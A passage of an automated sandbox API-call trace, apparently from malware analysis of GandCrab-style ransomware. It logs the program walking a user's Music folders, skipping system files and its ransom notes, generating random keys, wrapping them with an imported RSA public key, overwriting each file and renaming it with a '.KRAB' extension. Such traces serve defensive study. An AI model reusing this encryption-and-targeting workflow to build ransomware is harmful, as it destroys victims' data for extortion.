lpFileSystemNameBuffer="NTFS") returned 1 [0093.742] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\d2ca4a08d2ca4dee3d.lock") returned 76 [0093.742] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l42bkk\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x778 [0093.756] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.756] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.757] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\") returned 53 [0093.757] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\*" [0093.757] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd920 [0093.758] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.758] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.758] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.758] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.758] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.758] lstrcmpW (lpString1="CLou.mp3", lpString2=".") returned 1 [0093.758] lstrcmpW (lpString1="CLou.mp3", lpString2="..") returned 1 [0093.758] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\", lpString2="CLou.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3" [0093.758] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.758] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3.KRAB") returned 66 [0093.758] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3") returned 61 [0093.758] lstrlenW (lpString=".mp3") returned 4 [0093.758] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.759] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0093.759] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3") returned 61 [0093.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3") returned 61 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="desktop.ini") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="autorun.inf") returned 1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="ntuser.dat") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="iconcache.db") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="bootsect.bak") returned 1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="boot.ini") returned 1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="ntuser.dat.log") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="thumbs.db") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="ntldr") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="NTDETECT.COM") returned -1 [0093.760] lstrcmpiW (lpString1="CLou.mp3", lpString2="Bootfont.bin") returned 1 [0093.760] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.760] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0093.761] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.761] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.762] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.762] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0093.762] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.762] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.762] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10113d0) returned 1 [0093.763] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.764] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.764] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.764] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0093.764] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0093.764] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.765] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0093.765] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0093.765] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0093.765] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0093.766] GetLastError () returned 0x0 [0093.766] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0093.766] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0093.766] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011678) returned 1 [0093.766] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0093.766] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0093.766] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0093.767] GetLastError () returned 0x0 [0093.767] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0093.767] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0093.767] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l42bkk\\clou.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0093.768] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.768] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.769] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x2e4f, lpOverlapped=0x0) returned 1 [0093.783] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd1b1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.783] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2e4f, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x2e4f, lpOverlapped=0x0) returned 1 [0093.783] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0093.783] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.787] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.789] CloseHandle (hObject=0x43c) returned 1 [0093.790] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.790] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l42bkk\\clou.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\CLou.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l42bkk\\clou.mp3.krab")) returned 1 [0093.791] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.791] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.792] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0093.792] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0093.792] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\d2ca4a08d2ca4dee3d.lock" [0093.792] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.792] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 81 [0093.792] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\d2ca4a08d2ca4dee3d.lock") returned 76 [0093.792] lstrlenW (lpString=".lock") returned 5 [0093.792] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.792] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0093.793] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.793] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.793] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.793] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0093.793] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0093.793] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\KRAB-DECRYPT.txt" [0093.793] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.794] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\KRAB-DECRYPT.txt.KRAB") returned 74 [0093.794] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\KRAB-DECRYPT.txt") returned 69 [0093.794] lstrlenW (lpString=".txt") returned 4 [0093.794] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.794] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0093.794] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.801] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\KRAB-DECRYPT.txt") returned 69 [0093.801] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\KRAB-DECRYPT.txt") returned 69 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0093.801] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0093.801] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.802] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.802] lstrcmpW (lpString1="umtd1tt3jIzDw.mp3", lpString2=".") returned 1 [0093.802] lstrcmpW (lpString1="umtd1tt3jIzDw.mp3", lpString2="..") returned 1 [0093.802] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\", lpString2="umtd1tt3jIzDw.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3" [0093.802] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.802] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3.KRAB") returned 75 [0093.802] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3") returned 70 [0093.802] lstrlenW (lpString=".mp3") returned 4 [0093.803] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.803] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0093.803] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.803] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3") returned 70 [0093.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3") returned 70 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="desktop.ini") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="autorun.inf") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="ntuser.dat") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="iconcache.db") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="bootsect.bak") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="boot.ini") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="ntuser.dat.log") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="thumbs.db") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="ntldr") returned 1 [0093.809] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="NTDETECT.COM") returned 1 [0093.810] lstrcmpiW (lpString1="umtd1tt3jIzDw.mp3", lpString2="Bootfont.bin") returned 1 [0093.810] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.811] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011018) returned 1 [0093.812] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.813] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.817] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.817] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0093.817] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0093.817] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.818] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0093.818] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.819] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.819] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.827] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0093.827] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0093.827] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.828] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0093.832] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdae0) returned 1 [0093.832] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0093.832] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0093.832] GetLastError () returned 0x0 [0093.832] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0093.832] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.832] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0093.833] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbe0a0) returned 1 [0093.833] CryptGetKeyParam (in: hKey=0xfbe0a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0093.833] CryptEncrypt (in: hKey=0xfbe0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0093.833] GetLastError () returned 0x0 [0093.833] CryptDestroyKey (hKey=0xfbe0a0) returned 1 [0093.833] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.833] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l42bkk\\umtd1tt3jizdw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0093.834] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.835] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.835] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x9528, lpOverlapped=0x0) returned 1 [0093.848] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff6ad8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.848] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x9528, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x9528, lpOverlapped=0x0) returned 1 [0093.849] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0093.849] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.854] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.854] CloseHandle (hObject=0x43c) returned 1 [0093.855] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.855] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l42bkk\\umtd1tt3jizdw.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\umtd1tt3jIzDw.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l42bkk\\umtd1tt3jizdw.mp3.krab")) returned 1 [0093.856] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.857] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0093.857] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0093.857] CloseHandle (hObject=0x778) returned 1 [0093.857] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.857] lstrcmpW (lpString1="l8ACBxU.m4a", lpString2=".") returned 1 [0093.857] lstrcmpW (lpString1="l8ACBxU.m4a", lpString2="..") returned 1 [0093.857] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\", lpString2="l8ACBxU.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\l8ACBxU.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\l8ACBxU.m4a" [0093.857] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.857] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\l8ACBxU.m4a.KRAB") returned 62 [0093.858] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn 